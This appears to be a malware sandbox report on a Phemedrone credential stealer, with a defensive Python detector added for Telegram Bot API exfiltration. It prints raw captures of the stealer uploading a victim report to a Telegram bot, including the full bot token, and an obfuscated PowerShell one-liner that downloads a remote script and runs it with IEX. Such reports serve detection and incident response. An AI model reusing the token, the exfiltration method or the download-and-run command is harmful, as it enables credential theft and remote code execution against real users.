Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3nbXZ3HUmwW4PyZAuv9s6xBmzCiU0Th2Lj9ZLdf9%2BWKs5RYnBzO1MiJCuEhhKHJhEegLcdVzyUfutEO0DmRVHFaQ2XYQ09Ph4HSt%2BtJH3aqFFhZAXHDmQZhXM6Ti%2Bg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Server: cloudflare
CF-RAY: 8dd34a7d1e166996-DFW
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1303&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2818&recv_bytes=690&delivery_rate=2250194&cwnd=246&unsent_bytes=0&cid=1f35afd6257d90f5&ts=228&x=0"
2024-11-04 08:38:59 UTC | 272 | IN | Data Raw: 31 35 66 0d 0a 7b 22 6c 61 74 69 74 75 64 65 22 3a 22 33 31 2e 30 30 36 35 22 2c 22 6c 6f 6e 67 69 74 75 64 65 22 3a 22 2d 39 37 2e 38 34 30 36 22 2c 22 61 63 63 75 72 61 63 79 22 3a 32 30 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 5c 2f 43 68 69 63 61 67 6f 22 2c 22 69 70 22 3a 22 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 39 22 2c 22 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 22 3a 22 41 53 38 31 30 30 20 41 53 4e 2d 51 55 41 44 52 41 4e 45 54 2d 47 4c 4f 42 41 4c 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 61 73 6e 22 3a 38 31 30 30 2c 22 61 72 65 61 5f 63 6f 64 65 22 3a 22 30 22 2c 22 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 5f 6e 61 6d 65 22 3a 22 41 53 4e 2d 51 55 41 44 52 41 4e 45 54 2d 47 4c 4f 42 41 4c 22 2c 22 63 69 74
Data Ascii: 15f{"latitude":"31.0065","longitude":"-97.8406","accuracy":20,"timezone":"America\/Chicago","ip":"173.254.250.69","organization":"AS8100 ASN-QUADRANET-GLOBAL","country_code":"US","asn":8100,"area_code":"0","organization_name":"ASN-QUADRANET-GLOBAL","cit
2024-11-04 08:38:59 UTC | 86 | IN | Data Raw: 6e 74 72 79 5f 63 6f 64 65 33 22 3a 22 55 53 41 22 2c 22 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 22 3a 22 4e 41 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 72 65 67 69 6f 6e 22 3a 22 54 65 78 61 73 22 7d 0a 0d 0a
Data Ascii: ntry_code3":"USA","continent_code":"NA","country":"United States","region":"Texas"}
2024-11-04 08:38:59 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 3
Source IP: 192.168.2.11
Source Port: 49795
Destination IP: 149.154.167.220
Destination Port: 443
PID: 3432
Process: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-04 08:39:06 UTC | 384 | OUT | POST /bot8091768794:AAFZsJ1h-6BiszgyLm-eH6c-uITQ7Z99Wbc/sendDocument HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/602.37 (KHTML, like Gecko) Chrome/49.0.1422.399 Safari/600
                                                          Content-Type: multipart/form-data; boundary=----------------------------8dcfc823ae7a7a0
                                                          Host: api.telegram.org
                                                          Content-Length: 723700
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
2024-11-04 08:39:06 UTC | 25 | IN | HTTP/1.1 100 Continue
                                                          2024-11-04 08:39:06 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 66 63 38 32 33 61 65 37 61 37 61 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 5b 55 53 5d 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 39 2d 50 68 65 6d 65 64 72 6f 6e 65 2d 52 65 70 6f 72 74 2e 70 68 65 6d 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 84 22 85 1f 94 34 c9 59 00 0b f7 72 1a 3c 79 5d 95 7c 57 45 d8 b8 0d 80 6e 9f 75 92 3a 65 28 e5 bd 57 08 87 e2 e7 77 b3 e0 6e ac 0c 81 e2 10 e3 19 33 54 fc 04 fe 40 95 18 50 47 07 26 91 4c
                                                          Data Ascii: ------------------------------8dcfc823ae7a7a0Content-Disposition: form-data; name="document"; filename="[US]173.254.250.69-Phemedrone-Report.phem"Content-Type: application/octet-stream"4Yr<y]|WEnu:e(Wwn3T@PG&L
                                                          2024-11-04 08:39:06 UTC16355OUTData Raw: 6d 8e ba fb 5a ad 22 cf fe 5e c3 84 1a 59 49 c9 0e b2 d9 ec 12 cc 50 20 24 ed ee d9 dc 37 c9 5f d1 dd d3 ee 9b 98 46 86 22 f5 a9 21 41 d8 18 bf 6a fb 64 c6 57 ae bf b6 47 d7 21 9e 70 08 e5 62 62 ac 43 4c 7e 55 3e e4 5d 27 c7 c4 be 80 a5 6a ed 67 89 82 64 af a6 f5 b1 35 f7 5b 3d 87 ad 2c af 68 a0 d2 93 cc 67 65 30 6e 15 6a 92 51 0c 6e 24 30 9b 66 cf 3e 32 fc 72 ed 58 55 c4 20 4b 43 1b df c6 21 f8 00 44 64 05 09 58 e6 99 9d 24 00 f3 33 4c 82 29 04 86 0c 83 70 03 17 c1 47 8d f3 cc 00 49 7e f7 ba a2 95 4e a3 8c 9e ed 10 99 8f 0d 97 5d 7a b7 70 ec d1 36 2d 8b db 19 85 d5 0c f0 6f 64 ba 6b 6d fd a0 2a 5d 00 74 f9 9d 6d 51 f5 db b8 c0 3e 53 23 72 35 54 83 85 92 11 be 88 04 55 2e eb a1 4e 3d 7b f3 91 70 88 61 8d 95 9d 76 f4 7b 3c b0 8e 26 37 f2 75 62 6d d6 96 5a
                                                          Data Ascii: mZ"^YIP $7_F"!AjdWG!pbbCL~U>]'jgd5[=,hge0njQn$0f>2rXU KC!DdX$3L)pGI~N]zp6-odkm*]tmQ>S#r5TU.N={pav{<&7ubmZ
                                                          2024-11-04 08:39:06 UTC16355OUTData Raw: 4c c8 b1 8b c1 15 39 bc 7b 81 a6 bc 6e f6 ba 66 bb 9b d6 06 eb 63 eb 09 63 a2 e3 b6 4f b1 80 d7 34 11 46 13 d3 a0 72 7f 89 71 88 cd 3a 8e de ca 4c 19 9c 95 3d 6a d0 5c 0d df 97 6d a5 e2 00 f1 e4 ab 5b 6a d8 b1 37 74 d8 33 8f 3c 1a 2c 43 62 38 ba 94 b9 3e 0a 7d 72 b7 30 0d f5 14 25 74 e8 d5 b4 62 26 9b ea 99 ec f8 96 5d 45 88 c3 c5 61 bc d5 7c 64 ab 0d 5b 43 fa a8 16 d8 3a 7c 2b ce e7 e6 2d b0 0a 0e 5a e4 2e b8 5a 91 43 2e 87 5e e5 f1 f1 75 74 1a 64 ae 5c a1 9e 14 1c 39 09 d3 fb e1 a3 65 a4 1a d2 e3 e2 de 88 64 fd 44 b9 c3 5e 11 4d 4c 1e 6b 18 d2 25 53 fb 30 1e ff a4 30 ef 2c f4 fb 66 91 ad bf 06 18 dd 65 99 9c f0 f1 ac 12 2a 2a be 3c 72 26 43 3b e4 18 48 8c a8 2c 7f e8 be fe f1 5c ba ca 3f ce 26 3e 97 e9 6c bd e1 2b 14 e6 a7 06 ab 21 55 11 1f 5b cb 69 87
                                                          Data Ascii: L9{nfccO4Frq:L=j\m[j7t3<,Cb8>}r0%tb&]Ea|d[C:|+-Z.ZC.^utd\9edD^MLk%S00,fe**<r&C;H,\?&>l+!U[i
                                                          2024-11-04 08:39:06 UTC16355OUTData Raw: 1c b8 d0 11 1a 49 1f fd ca 85 37 fa 59 cd ed 20 5e a4 06 37 6c 2f 0f 86 49 44 2c e0 63 29 76 3d b4 03 0a 45 6e 91 0e 52 72 1f fa 2b d0 74 97 1a 3e 3e a2 ec 35 a2 4e dc 19 c2 e9 06 79 bf 7e ce 7f c1 d3 26 15 f0 13 5f ac 90 cc 71 fa 80 51 e3 af cd be cf 26 3c ea 7a 6a 16 58 b4 4e bd b2 00 09 65 6b fe 9e ee 9f 2f 5c 3f 2c 1c bf 9e 20 dd b5 73 69 d8 cf 7b 98 ae 1e 65 c1 68 4a f6 a5 4c 08 8f df b4 28 cf 7a d7 21 5c 66 b6 5e ec d0 77 69 3b 1b 8a 4f df 2c 55 68 24 1d 47 ef 1c 36 e1 15 fc ad ac cc 0f 86 d5 15 a9 aa 65 0b 28 38 c4 44 97 0d 72 cf 4c 49 98 46 ef 25 b6 ca 04 7f d6 ff 3c 6e a1 fe 0d 41 34 a5 5f 89 c0 41 67 1d 52 fa cd b5 31 5d 86 b6 b8 85 4a 7b ae fc 6e 76 ae 72 a5 a8 74 80 29 c5 58 34 90 19 35 83 84 8d 51 f1 9c 9d 7b 28 01 0f 13 67 b3 82 fd 21 a0 d1
                                                          Data Ascii: I7Y ^7l/ID,c)v=EnRr+t>>5Ny~&_qQ&<zjXNek/\?, si{ehJL(z!\f^wi;O,Uh$G6e(8DrLIF%<nA4_AgR1]J{nvrt)X45Q{(g!
                                                          2024-11-04 08:39:06 UTC16355OUTData Raw: 58 09 cd 74 26 62 b4 ed a0 23 25 d3 1e e0 f3 b0 0d 5a be 66 0f 36 90 7d 6e 98 f5 cf f5 06 b7 70 87 72 29 0f 9c e9 ca 5b c1 87 95 06 38 8d 56 c5 25 95 39 d4 12 e7 df 3c 2d 83 9e a0 53 9c ad 06 64 de 63 39 2f ba 9c d5 b5 13 4c 0a 11 03 bb ea f2 6c 5a 54 98 b9 9a 2e 37 04 a3 df 9d 66 0f cb b1 c2 56 2f 35 e7 2d 7e 76 b3 6a d6 8f 86 74 4c db 7f 07 ff 1d 8a 0f 75 ee 9d 54 55 18 72 2b fe 20 7d 2d 32 e5 95 77 75 ca ff 28 27 0f f0 21 34 a1 a2 d3 95 b6 85 73 d9 1c c8 ff fa f1 b8 82 91 ab 0c ff 8e 4e 3e 59 2d f6 68 3f 34 6b 4c d6 bf 4f 46 13 31 53 3c 0f 82 55 de 27 d5 ec 18 33 e2 17 de ee 33 56 c1 42 54 79 42 5f 3a 01 a2 dc 22 33 cc bd 7a 09 9a a1 8d f9 95 65 4a af c5 4d 96 33 16 5d 81 be 69 c8 d5 07 ee 3e 45 98 6d bb ed 16 44 dc 33 bf 00 34 39 20 4d 54 d8 60 30 1e
                                                          Data Ascii: Xt&b#%Zf6}npr)[8V%9<-Sdc9/LlZT.7fV/5-~vjtLuTUr+ }-2wu('!4sN>Y-h?4kLOF1S<U'33VBTyB_:"3zeJM3]i>EmD349 MT`0
                                                          2024-11-04 08:39:06 UTC145OUTData Raw: fd 6c 3e 3a a0 be 60 5c d2 f3 af e8 22 69 1b 4d d3 80 0a e5 82 9f 40 9f 5f c7 ed 04 a2 56 b4 44 39 0c 48 ac df c9 b5 7f e5 b0 c6 3a 1b 5d aa 44 e7 8a 8c 04 84 27 b0 d0 0e 76 56 37 2d 25 a6 f0 6b ea 87 2e f1 3e 53 7f d9 dd 88 5c fe 93 39 dd d1 53 e6 26 e8 44 58 6b 65 d2 3e 75 aa 0c 67 67 eb 42 85 15 ba 70 5d 0a 3d a8 3c c1 18 4b c6 4f ef 41 63 1a ec 6a e7 05 28 b3 31 bb be 87 f1 f9 8f 3e a0 16 e9 b5 d3 75 4d 90 cc 1b e1 de 67 0a 4d
                                                          Data Ascii: l>:`\"iM@_VD9H:]D'vV7-%k.>S\9S&DXke>uggBp]=<KOAcj(1>uMgM
                                                          2024-11-04 08:39:06 UTC16355OUTData Raw: 7b 64 c9 9f 9a f5 b4 85 30 c2 84 6b bc 7a 54 a4 6e 6f 16 97 d7 ba 8b fb 59 58 e5 96 50 85 d6 1e be 39 11 f5 88 c7 b7 5e 80 35 7f 58 8b 14 f0 78 0a 1e 7c 45 20 c0 1f 21 a9 7d dd c5 7b b3 98 c6 5c 1d 26 f5 84 e2 3e 96 9b 9b 04 93 35 7e 6f 14 96 35 53 1a f8 12 2c c3 6a ba cc 4d 9f 47 6b a1 88 63 05 67 eb 17 2d 85 57 b0 3d ce 58 0f e6 cb 1a 77 c3 51 85 0e 48 bb 8a 82 eb 6a 85 3d 0a f8 e9 ac 79 c0 9f e8 28 c3 b7 ba 34 14 5f 91 01 a8 8b 2a b4 e8 bc a8 ee 5b 07 82 da 50 39 9c a6 52 1b c8 32 91 84 d9 31 30 bb a2 2f 30 93 24 73 02 a1 d6 1a 5e e0 3d 56 09 f8 a0 61 15 58 22 57 29 2b e8 2a a3 0d 76 62 ff ba 4f 43 7b 47 8d 82 8f 16 1a 6d d4 5d 05 9b b3 f2 fd 8b 96 e1 1e 55 ed aa 00 31 5c 2e 3f 18 f1 dc 7a 50 07 d2 6f 36 2e b9 c2 f1 ec 77 10 1f 4f ed 5b 5f a1 63 c2 4f
                                                          Data Ascii: {d0kzTnoYXP9^5Xx|E !}{\&>5~o5S,jMGkcg-W=XwQHj=y(4_*[P9R210/0$s^=VaX"W)+*vbOC{Gm]U1\.?zPo6.wO[_cO
                                                          2024-11-04 08:39:06 UTC16355OUTData Raw: b6 87 69 4b 24 2c 60 df f1 ee 63 13 ee 42 0b 4e 2d e3 c2 c9 ad f6 17 70 c0 1a 8d 19 8f 5b 7e ae 2b 62 18 5d b7 c6 31 84 77 5a 55 e2 21 34 22 12 a0 20 53 44 ab f0 10 60 03 1b af a0 2f 5e 9c 1c 59 fd 7f d0 08 a7 6b 2f e6 db b0 87 bd 56 51 60 7e ce 89 ab 4f 88 46 cc 6f c4 9a 98 2e 97 ac 23 aa 8d d5 b0 d1 09 9d c1 fb c0 a3 03 43 8b 2a c5 07 93 aa b8 fa 2c 77 0e e9 50 3a 3c 2e 1f a0 0b 99 72 e4 bc 14 b2 91 c0 c8 be b8 ee c3 52 0c 08 0b 10 7d cd 0f 2d 4c b6 60 3b bd fd 02 a4 ae 9e ee 2b 5f dd 77 76 e4 82 36 6a 6a f0 b2 a0 18 94 89 be c3 a5 d2 00 5c 6c 17 ea ea b6 36 d2 08 2b 38 f9 b8 7b c5 1c 3e e1 63 9a 87 62 f8 cc 96 e1 10 90 1b 7e cf 61 87 7c f0 74 1b b3 14 67 c7 2e 2e f3 a2 a4 4e ed ad 51 35 ea f0 e8 ad d8 8c fb 09 fc 88 46 ba 84 7d 53 5f e5 8a 00 57 24 52
                                                          Data Ascii: iK$,`cBN-p[~+b]1wZU!4" SD`/^Yk/VQ`~OFo.#C*,wP:<.rR}-L`;+_wv6jj\l6+8{>cb~a|tg..NQ5F}S_W$R
                                                          2024-11-04 08:39:06 UTC16355OUTData Raw: 48 b1 03 80 81 93 ff 69 93 95 f4 1a 85 e9 13 35 f8 44 df 38 1a ed 20 18 87 cb ed 73 a9 d4 2d 23 ff 06 30 f4 eb a4 55 95 eb f5 d2 03 ba 37 9e 88 8c 5c 51 dc 30 51 3c e2 5e d5 b8 f3 dc 0b b2 46 22 fd 1b 5c f9 bd 17 80 bd 8d 48 55 81 83 da 81 8d e3 2e a3 d2 21 a9 70 22 79 ef 35 cd 7c 11 c3 0d 10 dd d4 24 99 aa 5e e4 4f f7 8b 9c 99 bb 6e 27 c3 d8 90 8b 6a f3 43 a7 85 1f 0d 43 42 81 d8 c3 e4 ca 3f 3a 64 0b 90 a6 22 83 a9 31 4c b4 58 eb 0e fa 59 2f a8 f0 f0 07 53 7a 54 3c ff 9e ea e2 61 4d cd 20 6d e6 55 b3 87 57 bd 97 50 0f 8d cf 2d d6 42 e3 c9 69 c3 ba ad dc 7f aa d8 0c b7 f8 42 26 cb ff de d5 e9 62 49 d6 0d cf 86 e7 f2 12 ac e5 ab 27 05 8a b5 9f 9d 9e 35 a3 79 08 e5 75 2b d7 6f 7e 06 1b 6c 66 c2 33 ac 84 5f dd 94 8c 2b 69 7f 67 8b 2d 72 0f 61 30 cd 4d e3 19
                                                          Data Ascii: Hi5D8 s-#0U7\Q0Q<^F"\HU.!p"y5|$^On'jCCB?:d"1LXY/SzT<aM mUWP-BiB&bI'5yu+o~lf3_+ig-ra0M
                                                          2024-11-04 08:39:06 UTC16355OUTData Raw: 4f a9 16 0e fb 31 25 ea 3b e4 46 1a 95 cc 63 02 bd 1d 35 3a 35 c5 6a d5 99 92 21 d9 b2 02 9a 68 81 b2 85 79 a3 4c 18 27 f9 c1 0a 72 f0 8c b8 5c 0b 1e 19 17 d6 d4 97 56 6f 82 25 08 46 22 81 ec f7 28 f4 dc 62 aa 65 ca 87 2b 11 12 d1 08 0e d0 c4 44 be 02 57 57 39 fd cd 96 6d fd c6 a2 c8 a6 dd 39 4d fe 4b 87 3b 77 52 94 2c 4a 78 db 58 5d ad 03 c4 a5 ec 1e 92 9d ed b5 9c b0 48 77 e4 fa c5 95 60 29 cb 5a ab 77 3d 54 ff b4 d0 b5 50 5d 8c a0 0e 08 cd 9d 7f 01 49 79 5e d2 f2 fc d1 53 ff 22 b7 88 58 c0 55 89 f0 60 ea 61 aa 74 ed a5 71 44 a7 14 9c c0 68 1b 90 3e ed 7d 44 1b 9a 14 58 b0 14 82 4b 26 c8 72 4c 94 a6 fe d3 5a 59 d4 09 d9 28 e1 54 87 ea 75 5b 9c 66 df f2 53 0e 77 d9 88 da 66 61 a9 e9 7d e8 0f 97 e6 75 e0 68 90 2e 03 83 a7 e3 4b 88 84 58 e0 25 65 7d a8 ea
                                                          Data Ascii: O1%;Fc5:5j!hyL'r\Vo%F"(be+DWW9m9MK;wR,JxX]Hw`)Zw=TP]Iy^S"XU`atqDh>}DXK&rLZY(Tu[fSwfa}uh.KX%e}
2024-11-04 08:39:07 UTC | 1285 | IN | HTTP/1.1 200 OK
                                                          Server: nginx/1.18.0
                                                          Date: Mon, 04 Nov 2024 08:39:07 GMT
                                                          Content-Type: application/json
                                                          Content-Length: 897
                                                          Connection: close
                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                          Access-Control-Allow-Origin: *
                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                          {"ok":true,"result":{"message_id":259,"from":{"id":8091768794,"is_bot":true,"first_name":"phstl","username":"phstlbot"},"chat":{"id":-4545922765,"title":"LOGS ERMANDO DUCATI [EXE]","type":"group","all_members_are_administrators":true},"date":1730709547,"document":{"file_name":"[US]173.254.250.69-Phemedrone-Report.phem","file_id":"BQACAgIAAxkDAAIBA2coiCsWAjE2MRuQlhuR60YLzmRrAALgbQACz2NBSV5Rd-JmtNnsNgQ","file_unique_id":"AgAD4G0AAs9jQUk","file_size":722928},"caption":"Phemedrone Stealer Report | by @webster480 & @TheDyer\n\n - IP: 173.254.250.69 (United States)\n - Tag: ermando (Yvoluze)\n - Passwords: 0\n - Cookies: 2\n - Wallets: 0\n\n\n\n\n@freakcodingspot","caption_entities":[{"offset":0,"length":25,"type":"bold"},{"offset":31,"length":11,"type":"mention"},{"offset":45,"length":8,"type":"mention"},{"offset":55,"length":108,"type":"pre"},{"offset":167,"length":16,"type":"mention"}]}}
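
The session above is the exfiltration step: WDSecureUtilities_548.exe posts a 723,700-byte multipart body to api.telegram.org (149.154.167.220:443) as a Bot API `sendDocument` call, and the API echoes back everything an analyst needs for a case file: the bot username, the destination group chat id and title, the uploaded file name and size, and the caption the stealer composed (victim IP, tag, and the counts of passwords, cookies and wallets). Two details worth noting from the visible bytes: the numeric prefix of the token in the request path (8091768794) is the bot's own user id, which the API returns as `from.id`, so the token is the bot's credential and the path alone identifies the operator infrastructure; and the `Expect: 100-continue` plus `Connection: Keep-Alive` headers are the defaults .NET's HttpWebRequest emits for a POST, consistent with the .NET stealer the Yara rules flag, while the browser-looking User-Agent is a fixed string rather than a real Chrome version. Official Telegram clients speak MTProto, not the HTTPS Bot API, so an endpoint posting to `api.telegram.org/bot<token>/send*` is a strong exfiltration signal on its own. The following is an added example, not code from the report or from Joe Security: it classifies such a request as a proxy or TLS-inspecting sensor would see it, and parses the `sendDocument` reply into case-file fields. The request line and JSON are taken from this session (the JSON trimmed to the fields used; `caption_entities` omitted); the hypothetical `classify_flow` verdict names are this example's own.

```python
import json
import re

# Request line and JSON reply as recorded in this report's session to 149.154.167.220:443.
# The reply is trimmed to the fields used below (caption_entities omitted).
REQUEST_LINE = "POST /bot8091768794:AAFZsJ1h-6BiszgyLm-eH6c-uITQ7Z99Wbc/sendDocument HTTP/1.1"
RESPONSE_JSON = r'''{"ok":true,"result":{"message_id":259,"from":{"id":8091768794,"is_bot":true,"first_name":"phstl","username":"phstlbot"},"chat":{"id":-4545922765,"title":"LOGS ERMANDO DUCATI [EXE]","type":"group","all_members_are_administrators":true},"date":1730709547,"document":{"file_name":"[US]173.254.250.69-Phemedrone-Report.phem","file_id":"BQACAgIAAxkDAAIBA2coiCsWAjE2MRuQlhuR60YLzmRrAALgbQACz2NBSV5Rd-JmtNnsNgQ","file_unique_id":"AgAD4G0AAs9jQUk","file_size":722928},"caption":"Phemedrone Stealer Report | by @webster480 & @TheDyer\n\n - IP: 173.254.250.69 (United States)\n - Tag: ermando (Yvoluze)\n - Passwords: 0\n - Cookies: 2\n - Wallets: 0\n\n\n\n\n@freakcodingspot"}}'''

# Bot API paths embed the bot token: /bot<numeric bot id>:<secret>/<method>
BOT_API_PATH = re.compile(r"^/bot(?P<bot_id>\d+):(?P<secret>[A-Za-z0-9_-]+)/(?P<method>\w+)$")
# Bot API methods that carry a file upload rather than just text.
UPLOAD_METHODS = {"sendDocument", "sendPhoto", "sendVideo", "sendAudio", "sendVoice", "sendAnimation"}
# Lines of the stealer's caption that summarise the loot, e.g. " - Cookies: 2"
CAPTION_COUNT = re.compile(r"^\s*-\s*(Passwords|Cookies|Wallets):\s*(\d+)\s*$", re.M)
CAPTION_IP = re.compile(r"-\s*IP:\s*(\d{1,3}(?:\.\d{1,3}){3})")


def parse_bot_request(request_line):
    """Split 'METHOD PATH HTTP/x' and pull the bot id and API method out of the path.
    The token secret is deliberately not returned: it belongs in the case file, not in alert text."""
    http_method, path, _ = request_line.split(" ", 2)
    m = BOT_API_PATH.match(path)
    if not m:
        return None
    return {"http_method": http_method, "bot_id": m.group("bot_id"), "api_method": m.group("method")}


def classify_flow(host, request_line):
    """Verdict for one HTTP request as seen by a proxy or TLS-inspecting sensor (names are this example's own)."""
    if host != "api.telegram.org":
        return "ignore"
    req = parse_bot_request(request_line)
    if req is None:
        return "ignore"          # no /bot<token>/ path: not a Bot API call
    if req["api_method"] in UPLOAD_METHODS and req["http_method"] == "POST":
        return "bot_upload"      # a file leaving the host through a bot: treat as exfiltration
    return "bot_call"            # polling or text messages: still a bot on an endpoint, lower severity


def parse_send_document_response(body):
    """Turn the sendDocument reply into case-file fields: where the loot went, what it was called,
    and the victim summary the stealer wrote into the caption."""
    result = json.loads(body)["result"]
    caption = result.get("caption", "")
    ip = CAPTION_IP.search(caption)
    return {
        "bot_username": result["from"]["username"],
        "chat_id": result["chat"]["id"],
        "chat_title": result["chat"]["title"],
        "file_name": result["document"]["file_name"],
        "file_size": result["document"]["file_size"],
        "victim_ip": ip.group(1) if ip else None,
        "counts": {name: int(n) for name, n in CAPTION_COUNT.findall(caption)},
    }


if __name__ == "__main__":
    print(classify_flow("api.telegram.org", REQUEST_LINE))
    for key, value in parse_send_document_response(RESPONSE_JSON).items():
        print(f"{key}: {value}")
```

The classifier keys on the path shape rather than the host alone because api.telegram.org also serves benign traffic from automation; the `/bot<id>:<secret>/` prefix is what distinguishes a bot acting on an endpoint. The reply parser is useful after the fact as well: the chat id and bot id recovered from a single captured response are stable pivots across victims of the same operator, whereas the file name changes with each victim's IP.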

                                                          Target ID:0
                                                          Start time:03:38:47
                                                          Start date:04/11/2024
                                                          Path:C:\Users\user\Desktop\DBp7mBJwqD.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Users\user\Desktop\DBp7mBJwqD.exe"
                                                          Imagebase:0x7ff60ed10000
                                                          File size:14'848'000 bytes
                                                          MD5 hash:C5D36C7404A03EC6DF8024737D97A0C8
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:low
                                                          Has exited:true

                                                          Target ID:1
                                                          Start time:03:38:47
                                                          Start date:04/11/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff68cce0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:3
                                                          Start time:03:38:47
                                                          Start date:04/11/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:cmd.exe /c "cmd.exe /c start /min cmd /c powershell -NoP -NonI -ExecutionPolicy Bypass -Command "$AI='https://'; $mode='api'; $update='tradingview.com/'; $dev='ermando1'; $beta='.txt'; $charts=$AI+$mode+$update+$dev+$beta; $userAgent='TradingView'; $Response=Invoke-WebRequest -Uri $charts -UseBasicParsing -UserAgent $userAgent; $Script=[System.Text.Encoding]::UTF8.GetString($Response.Content); IEX $Script""
                                                          Imagebase:0x7ff716680000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:4
                                                          Start time:03:38:47
                                                          Start date:04/11/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff68cce0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:5
                                                          Start time:03:38:47
                                                          Start date:04/11/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:cmd.exe /c start /min cmd /c powershell -NoP -NonI -ExecutionPolicy Bypass -Command "$AI='https://'; $mode='api'; $update='tradingview.com/'; $dev='ermando1'; $beta='.txt'; $charts=$AI+$mode+$update+$dev+$beta; $userAgent='TradingView'; $Response=Invoke-WebRequest -Uri $charts -UseBasicParsing -UserAgent $userAgent; $Script=[System.Text.Encoding]::UTF8.GetString($Response.Content); IEX $Script"
                                                          Imagebase:0x7ff716680000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:6
                                                          Start time:03:38:47
                                                          Start date:04/11/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:cmd /c powershell -NoP -NonI -ExecutionPolicy Bypass -Command "$AI='https://'; $mode='api'; $update='tradingview.com/'; $dev='ermando1'; $beta='.txt'; $charts=$AI+$mode+$update+$dev+$beta; $userAgent='TradingView'; $Response=Invoke-WebRequest -Uri $charts -UseBasicParsing -UserAgent $userAgent; $Script=[System.Text.Encoding]::UTF8.GetString($Response.Content); IEX $Script"
                                                          Imagebase:0x7ff716680000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:7
                                                          Start time:03:38:47
                                                          Start date:04/11/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff68cce0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:8
                                                          Start time:03:38:47
                                                          Start date:04/11/2024
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:powershell -NoP -NonI -ExecutionPolicy Bypass -Command "$AI='https://'; $mode='api'; $update='tradingview.com/'; $dev='ermando1'; $beta='.txt'; $charts=$AI+$mode+$update+$dev+$beta; $userAgent='TradingView'; $Response=Invoke-WebRequest -Uri $charts -UseBasicParsing -UserAgent $userAgent; $Script=[System.Text.Encoding]::UTF8.GetString($Response.Content); IEX $Script"
